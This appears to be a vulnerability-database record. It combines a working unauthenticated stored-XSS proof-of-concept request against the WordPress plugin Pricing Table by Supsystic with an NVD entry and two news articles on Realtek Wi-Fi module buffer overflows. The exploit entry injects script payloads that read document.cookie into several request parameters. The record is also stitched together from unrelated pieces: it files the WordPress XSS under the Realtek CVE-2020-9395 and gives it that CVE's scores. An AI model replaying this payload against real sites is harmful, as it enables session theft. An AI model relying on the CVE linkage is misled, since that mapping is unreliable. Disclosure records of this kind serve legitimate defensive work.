The ImportJSONTable endpoint performs no permission check, which allows unauthenticated users to inject malicious JavaScript.
### PoC
URL/wp-admin/admin-ajax.php?mod=tables&action=importJSONTable&data%5B0%5D%5Bid%5D=11&data%5B0%5D%5Bunique_id%5D=Pwn8M1EB&data%5B0%5D%5Blabel%5D=&data%5B0%5D%5Boriginal_id%5D=11&data%5B0%5D%5Bparams%5D%5Bbg_color%5D%5Bval%5D=%23424242&data%5B0%5D%5Bparams%5D%5Btxt_item_html%5D%5Bval%5D=%3Cdiv+class%3D%22ptsEl%22+data-el%3D%22table_cell_txt%22+data-type%3D%22txt%22%3E%3Cp%3E%3Cspan+style%3D%22font-size%3A+12pt%3B%22+data-mce-style%3D%22font-size%3A+12pt%3B%22%3EYour+Text%3C%2Fspan%3E%3C%2Fp%3E%3C%2Fdiv%3E&data%5B0%5D%5Bparams%5D%5Bimg_item_html%5D%5Bval%5D=%3Cdiv+class%3D%22ptsEl+ptsElImg+ptsElWithArea%22+data-el%3D%22table_cell_img%22+data-type%3D%22img%22%3E%0D%0A%09%3Cdiv+class%3D%22ptsElArea%22%3E%3Cimg+src%3D%22http%3A%2F%2Fsupsystic-42d7.kxcdn.com%2F_assets%2Ftables%2Fimg%2Fexample.jpg%22+%2F%3E%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E&data%5B0%5D%5Bparams%5D%5Bicon_item_html%5D%5Bval%5D=%3Cdiv+data-icon%3D%22fa-cog%22+data-color%3D%22rgb(0%2C+220%2C+223)%22+data-type%3D%22icon%22+data-el%3D%22table_cell_icon%22+class%3D%22ptsIcon+ptsEl+ptsElInput%22%3E%3Ci+class%3D%22fa+fa-2x+ptsInputShell+fa-cog%22+style%3D%22color%3A+rgb(0%2C+220%2C+223)%3B%22%3E%3C%2Fi%3E%3C%2Fdiv%3E&data%5B0%5D%5Bparams%5D%5Bnew_column_html%5D%5Bval%5D=&data%5B0%5D%5Bparams%5D%5Bnew_cell_html%5D%5Bval%5D=&data%5B0%5D%5Bparams%5D%5Bcell_color_css%5D%5Bval%5D=&data%5B0%5D%5Bparams%5D%5Benb_desc_col%5D%5Bval%5D=1&data%5B0%5D%5Bparams%5D%5Bcol_width%5D%5Bval%5D=186&data%5B0%5D%5Bparams%5D%5Bcols_num%5D%5Bval%5D=4&data%5B0%5D%5Bparams%5D%5Brows_num%5D%5Bval%5D=5&data%5B0%5D%5Bparams%5D%5Bcalc_width%5D%5Bval%5D=table&data%5B0%5D%5Bparams%5D%5Btable_width%5D%5Bval%5D=100&data%5B0%5D%5Bparams%5D%5Btable_width_measure%5D%5Bval%5D=%25&data%5B0%5D%5Bparams%5D%5Benb_hover_animation%5D%5Bval%5D=1&data%5B0%5D%5Bparams%5D%5Bfont_family%5D%5Bval%5D=Raleway&data%5B0%5D%5Bparams%5D%5Btext_color%5D%5Bval%5D=%23000&data%5B0%5D%5Bparams%5D%5Btext_color_header%5D%5Bval%5D=%23808080&data%5B0%5D%5Bparams%5D%5Btext_color_desc%5D%5Bval%5D=%23808080&data%5B0%5D%5Bparams%5D%5Bresp_min_col_width%5D%5Bval%5D=150&data%5B0%5D%5Bparams%5D%5Bis_horisontal_row_type%5D%5Bval%5D=0&data%5B0%5D%5Bhtml%5D=&data%5B0%5D%5Bcss%5D=&data%5B0%5D%5Bimg%5D=gradient-standard.jpg&data%5B0%5D%5Bsort_order%5D=0&data%5B0%5D%5Bis_base%5D=1&data%5B0%5D%5Bis_pro%5D=0&data%5B0%5D%5Bdate_created%5D=2020-01-16+00%3A40%3A10&data%5B0%5D%5Bimg_url%5D=http%3A%2F%2Fsupsystic-42d7.kxcdn.com%2F_assets%2Ftables%2Fimg%2Fprev%2Fgradient-standard.jpg&data%5B0%5D%5Bsession_id%5D=715993&data%5B0%5D%5Bview_id%5D=ptsBlock_715993&data%5B0%5D%5Bcat_code%5D=price_table&update_with_same_id=1&pl=pts&reqType=ajax
{"cve": [{"lastseen": "2022-03-23T19:07:09", "description": "An issue was discovered on Realtek RTL8195AM, RTL8711AM, RTL8711AF, and RTL8710AF devices before 2.0.6. A stack-based buffer overflow exists in the client code that takes care of WPA2's 4-way-handshake via a malformed EAPOL-Key packet with a long keydata buffer.", "cvss3": {"exploitabilityScore": 1.3, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-06T22:15:00", "type": "cve", "title": "CVE-2020-9395", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.9, "vectorString": "AV:A/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9395"], "modified": "2021-07-21T11:39:00", "cpe": [], "id": "CVE-2020-9395", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9395", "cvss": {"score": 4.9, "vector": "AV:A/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "wpexploit": [{"lastseen": "2021-02-15T22:20:21", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-9395"], "description": "No permission check on the ImportJSONTable endpoint allows for malicious javascript to be injected by unauthenticated users.\n", "modified": "2020-09-22T08:26:21", "published": "2020-02-25T00:00:00", "id": 
"WPEX-ID:61148EB6-021A-4055-AF61-CDD8F29EB226", "href": "", "type": "wpexploit", "title": "Pricing Table by Supsystic < 1.8.2 - Unauthenticated Stored XSS", "sourceData": "URL/wp-admin/admin-ajax.php?mod=tables&action=importJSONTable&data%5B0%5D%5Bid%5D=11&data%5B0%5D%5Bunique_id%5D=Pwn8M1EB&data%5B0%5D%5Blabel%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Boriginal_id%5D=11&data%5B0%5D%5Bparams%5D%5Bbg_color%5D%5Bval%5D=%23424242&data%5B0%5D%5Bparams%5D%5Btxt_item_html%5D%5Bval%5D=%3Cdiv+class%3D%22ptsEl%22+data-el%3D%22table_cell_txt%22+data-type%3D%22txt%22%3E%3Cp%3E%3Cspan+style%3D%22font-size%3A+12pt%3B%22+data-mce-style%3D%22font-size%3A+12pt%3B%22%3EYour+Text%3C%2Fspan%3E%3C%2Fp%3E%3C%2Fdiv%3E&data%5B0%5D%5Bparams%5D%5Bimg_item_html%5D%5Bval%5D=%3Cdiv+class%3D%22ptsEl+ptsElImg+ptsElWithArea%22+data-el%3D%22table_cell_img%22+data-type%3D%22img%22%3E%0D%0A%09%3Cdiv+class%3D%22ptsElArea%22%3E%3Cimg+src%3D%22http%3A%2F%2Fsupsystic-42d7.kxcdn.com%2F_assets%2Ftables%2Fimg%2Fexample.jpg%22+%2F%3E%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E&data%5B0%5D%5Bparams%5D%5Bicon_item_html%5D%5Bval%5D=%3Cdiv+data-icon%3D%22fa-cog%22+data-color%3D%22rgb(0%2C+220%2C+223)%22+data-type%3D%22icon%22+data-el%3D%22table_cell_icon%22+class%3D%22ptsIcon+ptsEl+ptsElInput%22%3E%3Ci+class%3D%22fa+fa-2x+ptsInputShell+fa-cog%22+style%3D%22color%3A+rgb(0%2C+220%2C+223)%3B%22%3E%3C%2Fi%3E%3C%2Fdiv%3E&data%5B0%5D%5Bparams%5D%5Bnew_column_html%5D%5Bval%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bparams%5D%5Bnew_cell_html%5D%5Bval%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bparams%5D%5Bcell_color_css%5D%5Bval%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bparams%5D%5Benb_desc_col%5D%5Bval%5D=1&data%5B0%5D%5Bparams%5D%5Bcol_width%5D%5Bval%5D=186&data%5B0%5D%5Bparams%5D%5Bcols_num%5D%5Bval%5D=4&data%5B0%5D%5Bparams%5D%5Brows_num%5D%5Bval%5D=5&data%5B0%5D%5Bparams%5D%5Bcalc_width%5D%5Bval%5D=table&data%5B0%5D%5Bparams%5D%5Btable_width%5D%5Bval%5D=100&data%5B0%5D%5Bp
arams%5D%5Btable_width_measure%5D%5Bval%5D=%25&data%5B0%5D%5Bparams%5D%5Benb_hover_animation%5D%5Bval%5D=1&data%5B0%5D%5Bparams%5D%5Bfont_family%5D%5Bval%5D=Raleway&data%5B0%5D%5Bparams%5D%5Btext_color%5D%5Bval%5D=%23000&data%5B0%5D%5Bparams%5D%5Btext_color_header%5D%5Bval%5D=%23808080&data%5B0%5D%5Bparams%5D%5Btext_color_desc%5D%5Bval%5D=%23808080&data%5B0%5D%5Bparams%5D%5Bresp_min_col_width%5D%5Bval%5D=150&data%5B0%5D%5Bparams%5D%5Bis_horisontal_row_type%5D%5Bval%5D=0&data%5B0%5D%5Bhtml%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bcss%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bimg%5D=gradient-standard.jpg&data%5B0%5D%5Bsort_order%5D=0&data%5B0%5D%5Bis_base%5D=1&data%5B0%5D%5Bis_pro%5D=0&data%5B0%5D%5Bdate_created%5D=2020-01-16+00%3A40%3A10&data%5B0%5D%5Bimg_url%5D=http%3A%2F%2Fsupsystic-42d7.kxcdn.com%2F_assets%2Ftables%2Fimg%2Fprev%2Fgradient-standard.jpg&data%5B0%5D%5Bsession_id%5D=715993&data%5B0%5D%5Bview_id%5D=ptsBlock_715993&data%5B0%5D%5Bcat_code%5D=price_table&update_with_same_id=1&pl=pts&reqType=ajax", "cvss": {"score": 4.9, "vector": "AV:A/AC:M/Au:S/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:09", "description": "[](<https://thehackernews.com/images/-lW6HeTxTMuU/YBuwaY2Oj9I/AAAAAAAABr0/WTaUEEPE5wk2AvPPvBkqa3r2TcdnXlZQgCLcBGAsYHQ/s0/Realtek.jpg>)\n\nMajor vulnerabilities have been discovered in the Realtek RTL8195A Wi-Fi module that could have been exploited to gain root access and take complete control of a device's wireless communications.\n\nThe six flaws were [reported](<https://www.vdoo.com/blog/realtek-rtl8195a-vulnerabilities-discovered>) by researchers from Israeli IoT security firm Vdoo.\n\nThe [Realtek RTL8195A](<https://www.realtek.com/en/products/communications-network-ics/item/rtl8195am>) module is a standalone, low-power-consumption Wi-Fi hardware module targeted at embedded devices used in several industries such as agriculture, smart home, healthcare, gaming, and automotive sectors.\n\nIt also makes 
use of an \"Ameba\" API, allowing developers to communicate with the device via Wi-Fi, HTTP, and [MQTT](<https://en.wikipedia.org/wiki/MQTT>), a lightweight messaging protocol for small sensors and mobile devices.\n\nAlthough the issues uncovered by Vdoo were verified only on RTL8195A, the researchers said they extend to other modules as well, including RTL8711AM, RTL8711AF, and RTL8710AF.\n\nThe flaws concern a mix of stack overflow, and out-of-bounds reads that stem from the Wi-Fi module's WPA2 [four-way handshake](<https://en.wikipedia.org/wiki/IEEE_802.11i-2004#Four-way_handshake>) mechanism during authentication.\n\n[](<https://thehackernews.com/images/-nF7One9swAc/YBus9VAcWZI/AAAAAAAABro/j_mvr2Xz91UpxmAletJwxU-qwCH0nfStACLcBGAsYHQ/s0/hacking.jpg>)\n\nChief among them is a buffer overflow vulnerability (CVE-2020-9395) that permits an attacker in the proximity of an RTL8195 module to completely take over the module, without having to know the Wi-Fi network password (or pre-shared key) and regardless of whether the module is acting as a Wi-Fi access point (AP) or client.\n\nTwo other flaws can be abused to stage a denial of service, while another set of three weaknesses, including CVE-2020-25854, could allow exploitation of Wi-Fi client devices and execute arbitrary code.\n\nThus in one of the potential attack scenarios, an adversary with prior knowledge of the passphrase for the WPA2 Wi-Fi network that the victim device is connected to can create a malicious AP by sniffing the network's SSID and Pairwise Transit Key (PTK) \u2014 which is used to encrypt traffic between a client and the AP \u2014 and force the target to connect to the new AP and run malicious code.\n\nRealtek, in response, has released Ameba Arduino 2.0.8 with patches for all the six vulnerabilities found by Vdoo. 
It's worth noting that firmware versions released after April 21, 2020, already come with the necessary protections to thwart such takeover attacks.\n\n\"An issue was discovered on Realtek RTL8195AM, RTL8711AM, RTL8711AF, and RTL8710AF devices before 2.0.6,\" the company [said](<https://www.amebaiot.com/en/security_bulletin/>) in a security bulletin. \"A stack-based buffer overflow exists in the client code that takes care of WPA2's 4-way-handshake via a malformed EAPOL-Key packet with a long keydata buffer.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-04T08:36:00", "type": "thn", "title": "Critical Bugs Found in Popular Realtek Wi-Fi Module for Embedded Devices", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25854", "CVE-2020-9395"], "modified": "2021-02-04T08:36:00", "id": 
"THN:0FEF773F12072BBB0AE74955BCBE33FB", "href": "https://thehackernews.com/2021/02/critical-bugs-found-in-popular-realtek.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:00", "description": "[](<https://thehackernews.com/images/-DmjDDFPDoR0/YLjBP6MGWvI/AAAAAAAACu8/jaOuWaGopfou_ho1qczfxJWDZXm8TU1RQCLcBGAsYHQ/s0/Realtek-hacking.jpg>)\n\nA new set of critical vulnerabilities has been disclosed in the Realtek RTL8170C Wi-Fi module that an adversary could abuse to gain elevated privileges on a device and hijack wireless communications.\n\n\"Successful exploitation would lead to complete control of the Wi-Fi module and potential root access on the OS (such as Linux or Android) of the embedded device that uses this module,\" researchers from Israeli IoT security firm Vdoo [said](<https://www.vdoo.com/blog/realtek-wifi-vulnerabilities-zero-day>) in a write-up published yesterday.\n\nThe Realtek [RTL8710C](<https://www.amebaiot.com/en/ameba-arduino-getting-started-rtl8710/>) Wi-Fi SoC underpins Ameba, an Arduino-compatible programmable platform equipped with peripheral interfaces for building a variety of IoT applications by devices spanning across agriculture, automotive, energy, healthcare, industrial, security, and smart home sectors.\n\nThe flaws affect all embedded and IoT devices that use the component to connect to Wi-Fi networks and would require an attacker to be on the same Wi-Fi network as the devices that use the RTL8710C module or know the network's pre-shared key (PSK), which, as the name implies, is a cryptographic secret used to authenticate wireless clients on local area networks.\n\nThe findings follow an [earlier analysis](<https://thehackernews.com/2021/02/critical-bugs-found-in-popular-realtek.html>) in February that found similar weaknesses in the Realtek RTL8195A Wi-Fi module, chief among them being a buffer overflow vulnerability (CVE-2020-9395) that permits an attacker in the proximity of an 
RTL8195 module to completely take over the module without having to know the Wi-Fi network password.\n\n[](<https://thehackernews.com/images/-jT-Ij62Y3Ww/YLjAZSsvbnI/AAAAAAAACu0/bk5UPh5Avo4dsjOPkJ7hCP8KVQrwo9l9ACLcBGAsYHQ/s0/hacking.jpg>)\n\nIn the same vein, the RTL8170C Wi-Fi module's WPA2 [four-way handshake](<https://en.wikipedia.org/wiki/IEEE_802.11i-2004#Four-way_handshake>) mechanism is vulnerable to two stack-based buffer overflow vulnerabilities (CVE-2020-27301 and CVE-2020-27302, CVSS scores: 8.0) that abuse the attacker's knowledge of the PSK to obtain remote code execution on WPA2 clients that use this Wi-Fi module.\n\nAs a potential real-world attack scenario, the researchers demonstrated a proof-of-concept (PoC) exploit wherein the attacker masquerades as a legitimate access point and sends a malicious encrypted group temporal key (GTK) to any client (aka supplicant) that connects to it via WPA2 protocol. A group temporal key is used to secure all multicast and broadcast traffic.\n\nVdoo said there are no known attacks underway exploiting the vulnerabilities, adding firmware versions released after Jan. 11, 2021 include mitigations that resolve the issue. The company also recommends using a \"strong, private WPA2 passphrase\" to prevent exploitation of the above issues in scenarios where the device's firmware can't be updated.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T11:54:00", "type": "thn", "title": "Researchers Warn of Critical Bugs Affecting Realtek Wi-Fi Module", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.7, "vectorString": "AV:A/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27301", "CVE-2020-27302", "CVE-2020-9395"], "modified": "2021-06-03T11:55:49", "id": "THN:F5C882106D7F77972BB6ECD8F8D3A13D", "href": "https://thehackernews.com/2021/06/researchers-warn-of-critical-bugs.html", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}]}